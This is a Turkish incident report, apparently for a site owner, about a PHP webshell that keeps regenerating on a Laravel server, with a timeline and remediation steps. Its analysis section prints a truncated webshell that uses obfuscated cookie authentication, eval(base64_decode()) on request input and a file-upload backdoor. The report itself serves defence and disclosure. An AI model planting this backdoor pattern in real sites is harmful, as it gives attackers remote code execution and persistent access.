📝 Basit Anlatım (Herkes İçin)
Sitenize yetkisiz bir "arka kapı" yerleştirilmiş!
Bu dosya (453bbb9eb16f.php),
kötü niyetli kişilerin sitenize uzaktan erişmesini sağlayan gizli bir araç.
Tıpkı evinizin arka bahçesine gizli bir kapı açmak gibi.
⚠️ Ne Kadar Ciddi?
- ✅ Saldırgan siteye istediği zaman girebiliyor
- ✅ Kod çalıştırabiliyor (her şeyi yapabilir)
- ✅ Dosya yükleyebiliyor (daha fazla virüs)
- ✅ Veritabanına erişebilir (kullanıcı bilgileri)
- ✅ Siteyi tamamen ele geçirebilir
🔍 Durum Neden Kritik?
- 3 kez silindi, 3 kez tekrar geldi!
- 28 Aralık 2025: İlk silme
- 1 Ocak 2026: Tekrar silme
- 2 Ocak 2026: Tekrar silme
- 4 Ocak 2026: TEKRAR OLUŞTU! ⚠️
- Bu gece (5 Ocak 00:05) ERİŞİLDİ! 🚨
Bu, başka bir gizli kapı ya da zafiyet olduğu anlamına geliyor. Dosya otomatik olarak yeniden oluşturuluyor!
🔧 Teknik Detaylar (Geliştiriciler İçin)
📂 Dosya Konumları
MD5 Hash: a7080448c4f5207e163c436e93d6dca3 (3 dosya da özdeş!)
⏱️ Zaman Çizelgesi
4 Ocak 2026 - 04:55:04
Dosya oluşturuldu (Birth time)
4 Ocak 2026 - 04:56:04
Son değişiklik tarihi
5 Ocak 2026 - 00:05:16
Son erişim tarihi - BU GECE ERİŞİLDİ! 🚨
💀 Zararlı Kod Analizi
<?php echo 409723*20;
if(md5($_COOKIE['d'])=="\61\x37\60\62\x38\146..."){
echo"\x6f\x6b";
eval(base64_decode($_REQUEST['id']));
if($_POST["\165\160"]=="\165\x70"){
@copy($_FILES["\x66\151\x6c\x65"]...);
}
}
?>
🔓 Cookie Authentication
MD5 hash kontrolü ile giriş (Password: bilinen)
⚡ eval(base64_decode())
Uzaktan kod çalıştırma - En tehlikeli backdoor türü
📤 File Upload
Dosya yükleme backdoor - Daha fazla malware yüklenebilir
🎭 Obfuscation
Octal/Hex encoding ile gizlenmiş kod
📋 Log Bulguları
4 Ocak 2026 tarihli error log'larda şu denemeleri görüyoruz:
⚠️ Bu, bir script'in otomatik olarak farklı konumlara webshell yazmaya çalıştığını gösteriyor!
🔍 Saldırı Nasıl Gerçekleşti?
🚨 Olası Senaryolar:
-
1.
Başka Bir Backdoor Var (En Olası)
Saldırgan başka bir gizli dosya üzerinden bu dosyayı tekrar tekrar oluşturuyor. Tüm sistemi taramak gerekiyor.
-
2.
Zafiyet (Vulnerability) Kullanımı
Laravel veya modüllerde dosya yükleme/yazma zafiyeti olabilir.
file_put_contentsgibi fonksiyonlar kontrol edilmeli. -
3.
FTP/SSH Kimlik Bilgileri Çalınmış
Saldırgan FTP/SSH şifrelerini ele geçirmiş olabilir. Tüm şifreler değiştirilmeli.
-
4.
Composer/NPM Paket Zehirlenmesi
Zararlı bir paket yüklenmiş olabilir (supply chain attack).
composer.jsonvepackage.jsonkontrol edilmeli.
⚡ Neden Tekrar Tekrar Oluşuyor?
Dosya 3 kez silindi ama her defasında geri geldi. Bu şu anlama geliyor:
- ✅ Cron job var - Otomatik yeniden oluşturuyor
- ✅ Başka backdoor var - Ana backdoor dosyayı tekrar yazıyor
- ✅ Persistence mechanism - Kalıcılık mekanizması kurulmuş
🚨 Acil Yapılacaklar (ŞİMDİ!)
1️⃣ Dosyaları Hemen Sil
⚠️ Ama bu tek başına yetmez! Tekrar gelecektir.
2️⃣ Tam Sistem Taraması
Tüm PHP dosyalarını tara:
3️⃣ Son 7 Gün Değişen Dosyalar
Şüpheli değişiklikleri bul:
4️⃣ Access Log İncele
Kim erişmiş kontrol et:
5️⃣ Şifreleri Değiştir
- ✅ FTP şifreleri
- ✅ SSH şifreleri
- ✅ Database şifreleri
- ✅ Plesk panel şifreleri
- ✅ .env dosyasındaki tüm şifreler
6️⃣ WAF/Firewall Ekle
Cloudflare veya ModSecurity ile ek koruma katmanı ekleyin.
📞 Sonraki Adımlar
💡 Kısa Vadede (Bugün)
- ✅ Zararlı dosyaları sil
- ✅ Tam sistem taraması yap
- ✅ Access log'ları incele
- ✅ Saldırganın IP'sini bul ve engelle
- ✅ Backup al (temiz versiyon)
🔒 Uzun Vadede (Bu Hafta)
- ✅ Tüm şifreleri değiştir
- ✅ Laravel/Composer paketlerini güncelle
- ✅ WAF/Firewall kur
- ✅ File upload zafiyetlerini kapat
- ✅ Monitoring sistemi kur (inotify)
- ✅ Güvenlik audit yap
📚 Ek Bilgiler
Dosya İzinleri
Owner: tuufi.com_:psacln
Permission: 0644
Dosya Boyutu
375 bytes (3 dosya da özdeş)
Risk Seviyesi
KRİTİK - 10/10